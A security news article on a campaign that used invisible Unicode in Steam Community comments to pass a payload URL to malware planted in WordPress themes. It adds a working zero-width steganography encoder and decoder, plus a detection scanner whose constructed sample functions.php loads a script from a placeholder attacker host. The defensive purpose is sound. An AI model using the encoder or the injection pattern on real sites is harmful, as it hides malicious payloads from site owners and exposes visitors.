- Malware hides payload in Steam Community comments
- WordPress sites used to host backdoors
- Nearly 2,000 sites compromised since July
Security researchers from GoDaddy found a cheeky new malware campaign that used comments made by Steam Community accounts as command-and-control (C2) infrastructure.
Here is how the attack plays out: the attackers first find vulnerable WordPress websites, or ones protected by weak credentials, and use them to host PHP malware somewhere in the site’s files. In the sample analysed, it was planted in a theme’s ‘functions.php’ file. This malware contains both a JavaScript injection component and a server-side backdoor.
Then, whenever a visitor loads the infected website, the malware contacts one of several Steam Community profiles and downloads the contents of the profile comments. On the surface these comments look harmless (albeit incoherent), but they also contain invisible Unicode characters which carry the actual payload.
“This encoding allows binary data to be embedded within normal-looking text. The visible characters serve as camouflage while the invisible characters carry the actual payload,” GoDaddy said.
The malware then extracts the characters, converts them into binary data, and reconstructs the original bytes. The researchers found that this recovered data contains a URL controlled by the attackers, which points to a domain hosting a JavaScript file spoofing a legitimate library.
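As an added illustration (not code from GoDaddy’s report or from the malware itself) of how invisible characters can carry bytes inside ordinary-looking text: the encoder below hides a payload in a cover comment using two zero-width code points, and the decoder recovers it by discarding every visible character. The choice of U+200B/U+200C and the one-bit-per-character mapping are assumptions; the report does not say which code points or which encoding the campaign uses, and the cover comment and URL are constructed.

```python
import math

# Assumed mapping: two zero-width code points stand in for the two bit values.
# The real campaign's code points and encoding are not given in the report.
ZW_ZERO = "\u200b"  # ZERO WIDTH SPACE -> bit 0
ZW_ONE = "\u200c"   # ZERO WIDTH NON-JOINER -> bit 1
BIT_OF = {ZW_ZERO: "0", ZW_ONE: "1"}


def _to_carriers(bits: str) -> str:
    """Turn a string of '0'/'1' into the corresponding zero-width characters."""
    return "".join(ZW_ONE if b == "1" else ZW_ZERO for b in bits)


def encode(cover: str, payload: bytes) -> str:
    """Spread the payload's bits across the cover text as zero-width characters.

    Each byte becomes eight invisible characters; they are dealt out evenly
    after the visible characters, so the result renders exactly like `cover`.
    """
    bits = "".join(f"{byte:08b}" for byte in payload)
    if not cover:
        return _to_carriers(bits)
    per_char = math.ceil(len(bits) / len(cover))
    out, pos = [], 0
    for ch in cover:
        out.append(ch)
        out.append(_to_carriers(bits[pos:pos + per_char]))
        pos += per_char
    return "".join(out)


def decode(text: str) -> bytes:
    """Recover the hidden bytes: keep only carrier characters, regroup into octets.

    Anything that is not one of the two carrier code points is camouflage and is
    skipped, so the decoder does not care what the visible comment says.
    """
    bits = "".join(BIT_OF[ch] for ch in text if ch in BIT_OF)
    usable = len(bits) - len(bits) % 8  # drop a trailing partial octet, if any
    return bytes(int(bits[i:i + 8], 2) for i in range(0, usable, 8))


def strip_invisible(text: str) -> str:
    """What a human (or a naive moderator) sees: the comment without carriers."""
    return "".join(ch for ch in text if ch not in BIT_OF)


def carrier_count(text: str) -> int:
    """Number of carrier code points present; a cheap hint that text is loaded."""
    return sum(1 for ch in text if ch in BIT_OF)


if __name__ == "__main__":
    # Constructed cover comment and placeholder URL; neither is from the campaign.
    cover = "gg nice trade, add me for more"
    hidden = b"https://cdn.example.invalid/jquery.min.js"
    comment = encode(cover, hidden)
    print(repr(strip_invisible(comment)))   # renders as the innocent cover text
    print(len(comment) - len(cover), "hidden characters")
    print(decode(comment))                   # the attacker-controlled URL
```

The decoder never looks at the visible text, which is why the comments can be incoherent: the words are only there so that a profile page full of comments does not look empty or raise flags at a glance.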
The malware then uses WordPress to load the attacker-controlled JavaScript on every frontend page, so every visitor’s browser downloads and runs it.
In the campaign, there are two sets of targets – vulnerable WordPress websites, and their visitors. Since uncovering the campaign in July last year, GoDaddy said it found almost 2,000 compromised WordPress sites. Unfortunately, the research report stops short of describing what the malware does to visitors.
If you run a WordPress website, GoDaddy recommends checking for references to Steam Community URLs, external JavaScript injections, and outbound connections from WordPress to Steam.
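An added example (not GoDaddy’s tooling) of the first two of those checks applied to a site’s PHP, JavaScript and HTML files: it flags Steam Community references, invisible Unicode code points sitting in source, and script URLs whose host is not on your allowlist. The regexes, the set of code points treated as invisible, and the sample functions.php content are all constructed for the example.

```python
import re
from pathlib import Path
from urllib.parse import urlparse

# Zero-width and other format code points that have no business in a theme file.
# The set is an assumption chosen for the example, not taken from the report.
INVISIBLE_RE = re.compile("[\u200b-\u200f\u2060-\u2064\ufeff\u00ad]")
STEAM_RE = re.compile(r"steamcommunity\.com", re.IGNORECASE)
# <script src="..."> tags and wp_enqueue_script('handle', 'https://...') calls
SCRIPT_SRC_RE = re.compile(r"""<script[^>]+src\s*=\s*["']([^"']+)["']""", re.IGNORECASE)
ENQUEUE_RE = re.compile(
    r"""wp_enqueue_script\s*\(\s*["'][^"']*["']\s*,\s*["'](https?://[^"']+)["']""",
    re.IGNORECASE,
)


def scan_text(name: str, text: str, allowed_hosts: set) -> list:
    """Return (file, finding) pairs for one file's contents."""
    findings = []
    if STEAM_RE.search(text):
        findings.append((name, "steam-community-reference"))
    hidden = len(INVISIBLE_RE.findall(text))
    if hidden:
        findings.append((name, f"invisible-unicode:{hidden}"))
    for match in list(SCRIPT_SRC_RE.finditer(text)) + list(ENQUEUE_RE.finditer(text)):
        host = urlparse(match.group(1)).hostname
        if host and host not in allowed_hosts:
            findings.append((name, f"external-script:{host}"))
    return findings


def scan_directory(root: str, allowed_hosts: set,
                   suffixes=(".php", ".js", ".html")) -> list:
    """Walk a WordPress install (wp-content is the usual place) and scan each file."""
    findings = []
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in suffixes:
            text = path.read_text(encoding="utf-8", errors="replace")
            findings.extend(scan_text(str(path), text, allowed_hosts))
    return findings


# Constructed stand-in for an infected functions.php; not the real sample.
SAMPLE_FUNCTIONS_PHP = (
    "<?php\n"
    "add_action('wp_head', function () {\n"
    "    $html = file_get_contents('https://steamcommunity.com/profiles/000/');\n"
    "});\n"
    "// looks like an ordinary comment but carries zero-width characters:\n"
    "// gg\u200b\u200c\u200b ez\u200c\u200c\n"
    "wp_enqueue_script('jquery-compat', 'https://cdn.example.invalid/jquery.min.js');\n"
)


if __name__ == "__main__":
    for item in scan_text("functions.php", SAMPLE_FUNCTIONS_PHP, {"example.com"}):
        print(*item)
```

The allowlist should contain only the CDN hosts you knowingly load scripts from; anything else that turns up, especially a domain serving a file named after a well-known library, deserves a look. The third check, outbound connections from the web server to Steam, is a host-level check (firewall or connection logs on the server), and is a useful confirmation when the file scan finds a reference.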
Via BleepingComputer